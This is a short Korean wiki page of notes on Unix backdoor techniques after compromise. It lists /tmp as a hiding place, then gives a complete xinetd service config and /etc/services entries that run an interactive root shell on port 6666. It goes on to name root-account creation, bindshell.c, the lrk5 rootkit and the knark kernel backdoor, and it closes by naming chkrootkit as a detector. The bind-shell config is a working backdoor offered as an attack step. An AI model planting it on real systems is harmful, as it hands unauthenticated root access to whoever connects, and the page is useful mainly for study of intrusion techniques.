주로사용하는 위치 /tmp or /var/tmp

xinetd 데몬을 이용하여 셸을 실행시키는 서비스 생성하여 특정 포트로 연결 
# cat /etc/cat/xinetd.d/hacker
service hacker
{
        disable = no
        flags           = REUSE
        socket_type     = stream
        wait            = no
        user            = root
        server          = /bin/sh
        server_args = -i
}

# cat /etc/services

hacker  6666/tcp
hacker  6666/udp


루트권한가진 계정 추가

[edit]

bindshell #

bindshell.c

rootedoor

[edit]

rootkit (공격도구 패키지) #

lrk5

[edit]

kernel backdoor #

knark - 리눅스커널 2.2에 설치

[edit]

루트킷 감지 프로그램 #

chkrootkit
Valid XHTML 1.0! Valid CSS! powered by MoniWiki
last modified 2008-08-27 17:31:13
Processing time 0.0078 sec